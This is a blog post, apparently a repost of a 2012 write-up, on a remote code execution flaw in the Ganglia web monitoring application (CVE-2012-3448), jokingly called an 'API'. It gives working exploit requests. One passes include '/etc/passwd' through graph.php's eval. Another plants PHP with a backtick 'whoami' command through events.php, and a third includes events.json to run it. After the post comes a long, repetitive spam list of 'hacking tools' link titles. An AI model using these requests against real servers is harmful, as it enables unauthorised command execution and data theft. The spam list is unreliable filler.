Friday, August 21, 2020

Extending Your Ganglia Install With The Remote Code Execution API

Previously I had gone over a somewhat limited local file include in the Ganglia monitoring application (http://ganglia.info). The previous article can be found here -
http://console-cowboys.blogspot.com/2012/01/ganglia-monitoring-system-lfi.html

I recently grabbed the latest version of the Ganglia web application to take a look to see if this issue has been fixed and I was pleasantly surprised... github is over here -
https://github.com/ganglia/ganglia-web
Looking at the code the following (abbreviated "graph.php") sequence can be found -

$graph = isset($_GET["g"])  ?  sanitize ( $_GET["g"] )   : "metric";
....
$graph_arguments = NULL;
$pos = strpos($graph, ",");
$graph_arguments = substr($graph, $pos + 1);
....
eval('$graph_function($rrdtool_graph,' . $graph_arguments . ');');


I can only guess that this previous snippet of code was meant to be used as some sort of API put in place for remote developers, unfortunately it is slightly broken. For some reason when this API was being developed part of its interface was wrapped in the following function -

function sanitize ( $string ) {
  return  escapeshellcmd( clean_string( rawurldecode( $string ) ) ) ;
}


According the the PHP documentation -
Following characters are preceded by a backslash: #&;`|*?~<>^()[]{}$\, \x0A and \xFF. ' and " are escaped only if they are not paired. In Windows, all these characters plus % are replaced by a space instead.


This limitation of the API means we cannot simply pass in a function like eval, exec, system, or use backticks to create our Ganglia extension. Our only option is to use PHP functions that do not require "(" or ")" a quick look at the available options (http://www.php.net/manual/en/reserved.keywords.php) it looks like "include" would work nicely. An example API request that would help with administrative reporting follows:
http://192.168.18.157/gang/graph.php?g=cpu_report,include+'/etc/passwd'

Very helpful, we can get a nice report with a list of current system users. Reporting like this is a nice feature but what we really would like to do is create a new extension that allows us to execute system commands on the Ganglia system. After a brief examination of the application it was found that we can leverage some other functionality of the application to finalize our Ganglia extension. The "events" page allows for a Ganglia user to configure events in the system, I am not exactly sure what type of events you would configure, but I hope that I am invited.
As you can see in the screen shot I have marked the "Event Summary" with "php here". When creating our API extension event we will fill in this event with the command we wish to run, see the following example request -
http://192.168.18.157/gang/api/events.php?action=add&summary=<%3fphp+echo+`whoami`%3b+%3f>&start_time=07/01/2012%2000:00%20&end_time=07/02/2012%2000:00%20&host_regex=

This request will set up an "event" that will let everyone know who you are, that would be the friendly thing to do when attending an event. We can now go ahead and wire up our API call to attend our newly created event. Since we know that Ganglia keeps track of all planned events in the following location "/var/lib/ganglia/conf/events.json" lets go ahead and include this file in our API call - 
http://192.168.18.157/gang/graph.php?g=cpu_report,include+'/var/lib/ganglia/conf/events.json'


As you can see we have successfully made our API call and let everyone know at the "event" that our name is "www-data". From here I will leave the rest of the API development up to you. I hope this article will get you started on your Ganglia API development and you are able to implement whatever functionality your environment requires. Thanks for following along.

Update: This issue has been assigned CVE-2012-3448

Related news


  1. Tools 4 Hack
  2. Hacks And Tools
  3. Hacker Tools 2020
  4. Wifi Hacker Tools For Windows
  5. Hacker Tools 2019
  6. Pentest Tools Subdomain
  7. Easy Hack Tools
  8. Hacking Tools Windows 10
  9. Hacking Tools And Software
  10. Pentest Tools Apk
  11. Hacker Tools Mac
  12. Hacker Tools Online
  13. Hacker Security Tools
  14. Growth Hacker Tools
  15. Hacker Tools 2019
  16. Bluetooth Hacking Tools Kali
  17. Hacking Tools Software
  18. New Hacker Tools
  19. Usb Pentest Tools
  20. Hacker Security Tools
  21. Hack Tools Download
  22. Hacking Tools Free Download
  23. Pentest Tools Subdomain
  24. Pentest Tools Website Vulnerability
  25. Hacker Tools Software
  26. Hack Website Online Tool
  27. Hacking Tools For Windows
  28. Pentest Tools Port Scanner
  29. Hacker Tools Mac
  30. Pentest Tools Find Subdomains
  31. Hack Tool Apk
  32. Pentest Tools For Mac
  33. Hackrf Tools
  34. Bluetooth Hacking Tools Kali
  35. Pentest Tools List
  36. Pentest Tools Online
  37. Hack Tools For Games
  38. Pentest Tools Github
  39. Hacking Tools Windows 10
  40. How To Install Pentest Tools In Ubuntu
  41. Pentest Tools For Android
  42. Hack Tools
  43. Bluetooth Hacking Tools Kali
  44. Hacker Tools List
  45. Hacker Security Tools
  46. Hacking Tools For Windows 7
  47. How To Install Pentest Tools In Ubuntu
  48. Pentest Tools Subdomain
  49. Hacker Tools Github
  50. Hacking Tools For Pc
  51. Hackrf Tools
  52. Pentest Tools Port Scanner
  53. Hacking Tools For Windows
  54. Ethical Hacker Tools
  55. Easy Hack Tools
  56. Pentest Box Tools Download
  57. Pentest Tools Bluekeep
  58. Hacking Tools For Kali Linux
  59. Hack Tools
  60. Beginner Hacker Tools
  61. Hacker Tools Github
  62. Hacker Tools For Mac
  63. Pentest Tools Bluekeep
  64. Ethical Hacker Tools
  65. Termux Hacking Tools 2019
  66. Pentest Tools Windows
  67. New Hack Tools
  68. Hak5 Tools
  69. Hacking Apps
  70. Pentest Tools Nmap
  71. Pentest Automation Tools
  72. Hacking Tools Software
  73. Hacking Tools For Pc
  74. Hack Tools For Ubuntu
  75. Hacking Tools Windows
  76. What Are Hacking Tools
  77. Pentest Tools Framework
  78. Pentest Reporting Tools
  79. Hacker Tools Windows
  80. Pentest Tools Apk
  81. Hak5 Tools
  82. Pentest Tools Kali Linux
  83. Hacker Tools
  84. Hacking Tools Download
  85. Hacker Tools Github
  86. Hacker Tools Software
  87. Hackrf Tools
  88. Hacker Tools For Mac
  89. Hacker Tools Linux
  90. Easy Hack Tools
  91. Hacking Tools For Games
  92. Kik Hack Tools
  93. Pentest Tools Website Vulnerability
  94. Hack Tools 2019
  95. Best Pentesting Tools 2018
  96. Hacker Tools
  97. Android Hack Tools Github
  98. New Hacker Tools
  99. Top Pentest Tools
  100. Best Pentesting Tools 2018
  101. Hack Website Online Tool
  102. Pentest Tools For Android
  103. Hack Website Online Tool
  104. Wifi Hacker Tools For Windows
  105. How To Hack
  106. Pentest Recon Tools
  107. Tools For Hacker
  108. How To Make Hacking Tools
  109. Hack Tools Mac
  110. Hack Website Online Tool
  111. Pentest Tools Subdomain
  112. Beginner Hacker Tools
  113. Hacker Tools Linux
  114. Best Hacking Tools 2019
  115. Hacker Tools For Ios
  116. Pentest Tools Nmap
  117. Hacking Tools Github
  118. Hack Tool Apk
  119. Hacker Tools Mac
  120. Hacker Tools 2020
  121. Hacking Tools For Windows Free Download
  122. Hacker Tools List
  123. Pentest Tools Github
  124. Hacking Tools Online
  125. Pentest Box Tools Download
  126. Pentest Tools Find Subdomains
  127. Nsa Hack Tools Download
  128. Hack Tool Apk
  129. Hack Rom Tools
  130. Hacking Tools Download
  131. Hacking Tools Online
  132. Hack Tools For Ubuntu
  133. Hacking Tools Free Download
  134. Hacker Tools Mac
  135. Hacker Tools
  136. Hacker Tools Github
  137. Hackrf Tools
  138. Growth Hacker Tools
  139. Hacker
  140. How To Hack
  141. Hacker Tool Kit
  142. Hack Tools
  143. Nsa Hack Tools
  144. Pentest Tools Framework
  145. Hacker Tools Free Download
  146. Hack Tools Online
Posted by at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)